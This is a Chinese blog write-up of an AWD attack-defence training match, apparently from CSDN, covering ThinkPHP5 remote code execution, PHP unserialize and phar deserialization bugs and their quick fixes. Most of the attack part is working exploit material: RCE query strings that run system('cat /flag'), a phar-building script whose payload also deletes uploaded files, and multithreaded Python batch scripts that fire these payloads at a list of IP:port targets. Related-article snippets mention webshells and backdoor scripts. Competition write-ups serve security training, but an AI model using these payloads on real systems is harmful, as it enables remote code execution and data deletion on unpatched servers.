awd的批量脚本 pwn_星盟安全团队AWD训练赛

最新推荐文章于 2024-08-10 10:08:50 发布
最新推荐文章于 2024-08-10 10:08:50 发布
阅读量1k 收藏
点赞数
文章标签: awd的批量脚本 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42164702/article/details/112275511
版权
这篇博客详细记录了星盟安全团队AWD训练赛中的漏洞利用和修复过程,涉及Web1的ThinkPHP5 RCE、反序列化和Phar反序列化问题,Web2的多个漏洞,Web3的一句话木马及命令执行,以及Pwn1和Pwn2的漏洞利用。博主提供了批量脚本和针对各种漏洞的修复建议。
摘要由CSDN通过智能技术生成

web1

这个题目我一共找到了四个漏洞。

Thinkphp5rce1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

这个可以直接打,修复方案如下

App.php的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因为thinkphp我比较熟悉所以就直接按照官方的方法修复了。

66dcf3df6bfee8ff2910652b8a31f2df.png

thinkphp5rce2
s=cat /flag&_method=__construct&method=&filter[]=system

这个是通过post方法进行传值,没有找到官方的修复方案,但事实上上面那个修了以后这个也就修掉了,为了保险起见我还是做了个双保险。在Request.php里面粗暴的修复了一下

c02c5eb7a0f65b2e95a343ec0b9ba5c1.png

反序列化1

链子还是很简单的,甚至没有链子,直接可以利用,就在入口文件index.php

2f1c03de8abac914693bd008601f2bdd.png

然后这里简单的反序列化点在Index.php

db1dc657203d63938899ac7e1b9687e4.png

修复方案,我是直接加了个正则进行替换,把所有字母替换成空,这里就没用了。但想想,这种方法还不如直接把代码删了。

批量利用脚本

import requestsimport refrom lxml import etreeimport timeimport threadingiptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9"    response = requests.get(url2)    flag = find_flag(response.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()
phar反序列化

这里有个上传功能,还有个文件读取功能,用脚趾头想想就知道是phar反序列化

修复方案我直接加了个过滤,把phar协议给过滤掉了。

76db8642c1b87eb3f13e40f95768e6de.png

6cfe793fd11455d9d1db8918573fd361.png

phar脚本

phpclass Core{
        public $data;    public function __construct(){
            $this->data="system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');";    }}$obj = new Core();@unlink("yds.phar");$phar = new Phar("yds.phar");$phar->startBuffering();$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");$phar->setMetadata(new Core());$phar->addFromString("yds.txt", "yds_is_so_beautiful");$phar->stopBuffering();rename('yds.phar', 'yds.gif');

批量脚本

import requestsimport refrom lxml import etreeimport timeimport threadingfrom requests import sessioniptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data):    reg = "flag{(.*?)}"    tmp = re.findall(reg, data)    result = []    for i in tmp:        i = 'flag{'+i+'}'        return idef ip_log(flag):    f = open('flag1.txt', 'a')    f.write(flag + "\n")    f.close()def attack(ip):    url1 = "http://"+ip+"/index.php/Index/index/upload"    files = {
    'image': open('yds.gif', 'rb')}    s = session()    response = s.post(url1, files=files)    url2 = "http://"+ip+"/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif'    response2 = s.get(url2)    flag = find_flag(response2.text)    ip_log(flag)    print(ip, ":", flag)for ip in iptables:    t = threading.Thread(target=attack, args=(ip, ))    t.start()
最低0.47元/天 解锁文章
信徒阿布
关注
awd批量脚本 pwn_Luz pwn题目批量部署脚本(一题一容器)
weixin_39861920的博客
12-20 538
一题一个docker,优点是便于单个题目的维护,缺点比较占用资源多题目部署在一个docker的见这里,但是为了避免权限过高带来的跨题目读取flag等问题,这个大佬锁死了可执行的命令,以至于部分题目直接使用"cat flag"等命令直接报错#coding:utf-8#by:Luzimportosimportsysimportrandomimporttimedefcreatflag()...
awd批量脚本 pwn_北极星杯AWD-Writeup
weixin_39966909的博客
12-20 867
前言祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后.我是M09ic,负责本次北极星杯AWD的赛后分享.靠着抱大腿以及足够的运气,很荣幸获得了第二名.感谢小远师傅,sayhi师傅,以及Alkaid师傅大哥大嫂国庆好!!!先贴上web题目源码:因为是先上的waf再做的备份,所以看到waf相关的东西师傅们可以无视...web1...
awd pwn小技巧
最新发布
weixin_72981769的博客
08-10 436
工具修改的字节数少,0x100字节以下不修改文件头信息沙箱规则可以自己定义支持i386和amd64支持pie开启和未开启情况注:已在ubuntu16、18、20上测试过默认版本gcc编译出的程序,通过;暂不支持g++编译出的程序。sandboxs文件夹sandbox1.asm实例运行脚本命令第一个参数是想要patch的elf文件,第二个参数是沙箱规则文件,可以从sandboxs文件夹里选,假如想输出更多的中间过程可以在最后参数加上一个1。(已自动识别32位和64位)
awd批量脚本 pwn_[原创]第一届护网杯线下决赛awd之shell多解
weixin_39571403的博客
12-20 676
前言好久不打比赛,顺便来北京实习就参加了护网杯。排名虽然有所提高但还是被各种大表哥吊打。(和企业参赛简直痛苦)这里带来决赛中awd比赛pwn题shell的两种漏洞利用方式。程序保护保护全开程序分析程序模拟了一个受限shell命令行的功能。一共有10个shell功能,根据漏洞利用方式可以分为两类。第一类:ls,pwd,passwd,login,exit其中passwd和login是假的利用方式。就是...
awd批量脚本 pwn_湖湘杯线下AWD记录
weixin_35526110的博客
12-30 828
发现一个 .shell.php菜刀马,密码c ,但是是root权限创建,并且有定时任务一直写入,无法删除,可以选择写一个 while循环删除他。然后根据.shell.php去批量拿flag。#coding=utf-8import requestsimport refrom gevent import poolfrom gevent import monkeyfrom gevent import ...
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
AWD批量拿分python脚本
05-12
根据网上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是网上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
awd批量脚本 pwn_CTF线下赛AWD套路小结
weixin_39784972的博客
12-20 1684
CTF线下赛AWD套路小结本文已在先知社区发表,欢迎访问,链接h最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了。一、AWD模式简介AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linu...
awd批量脚本 pwn_北极星杯 awd复现
weixin_39811101的博客
01-12 976
北极星杯 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
awd批量脚本 pwn_记一次AWD反杀之旅
weixin_39611340的博客
12-20 1186
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的时候由于技术师傅的手误,前两轮设置后台check扣分的时候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
PwnWAF:用于AWDpwn日志工具
05-16
PWA文件 用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
awd批量脚本 pwn_AWD脚本批量mysql写shell
weixin_34185396的博客
01-12 228
摘之工具包中脚本需要安装mysqldb。windwos环境直接在https://www.codegood.com/archives/129下载MySQL-python-1.2.3.win-amd64-py2.7.exe安装。#coding=utf-8import MySQLdbdef mysql_connect1(ip,m_user,m_password,shell_url,shell_conte...
awd批量脚本 pwn_可扩展批量攻击脚本.py
weixin_35033082的博客
12-30 761
# -*- coding: UTF-8 -*#//========================================================================================#//#// ## ## ###### ## ## ## ## ## ### ####// ## ## ## ##...
AWDPWN题流量捕获和反打实验
m0_52249553的博客
05-09 1711
这里用一个vps模拟被攻击的远程主机,并在其上面用tcpdump监听pwn题所在的端口,然后根据攻击流量,编写exp脚本复现攻击
awd pwn——LIEF学习
CoLin的pwn小屋
04-04 2263
python LIEF库学习
awd批量脚本 pwn_星盟安全团队10.26AWD训练赛总结
weixin_39633089的博客
01-02 528
前言和往常一样,这次已经是咱们星盟的第六次线上awd比赛了,曾经我问老大这样的意义,老大说了句,玉不琢不成器,本次比赛还是那样刺激,16支队伍实力都挺强,学会了点姿势来总结一下,提示本篇你不一定能学到技术,大佬勿喷,一种思路技巧。骑马打马。。。比赛时间2019年10月26日 19:00内容pwn* 2web* 2比赛规则每个队伍分配到一个docker主机,给定web (web)/pwn(...
Pwn之简单patch
蚁景网安学院
09-27 2882
亲爱的,关注我吧9/27文章共计1389个词图片xue微有点多注意流量哦预计阅读7分钟来和我一起阅读吧1引言在攻防的时候不仅仅需要break,还需要fix将漏洞patch上。2工具这里...
AWD攻击脚本-多线程-批量-打全场-保存flag
BlusKing
09-21 5429
多线程批量attack全场,并输出、保存flag 一、针对文件包含漏洞的脚本 #!/usr/bin/env python # encoding: utf-8 import requests import urllib import time import threading import base64 #批量Get_Flag def init1(): global ...
【2020安洵杯线下赛】AWD的第一道pwn
古月浪子的博客
12-18 2449
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
awd比赛后门通用脚本
10-16
AWD(Attack With Defense)比赛是一种以攻击与防守相结合的网络安全竞赛。比赛中使用的后门通用脚本是指用于在攻击者控制的主机上安装和管理后门,以达到控制目标系统的目的。通常,这样的脚本具有以下特点: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值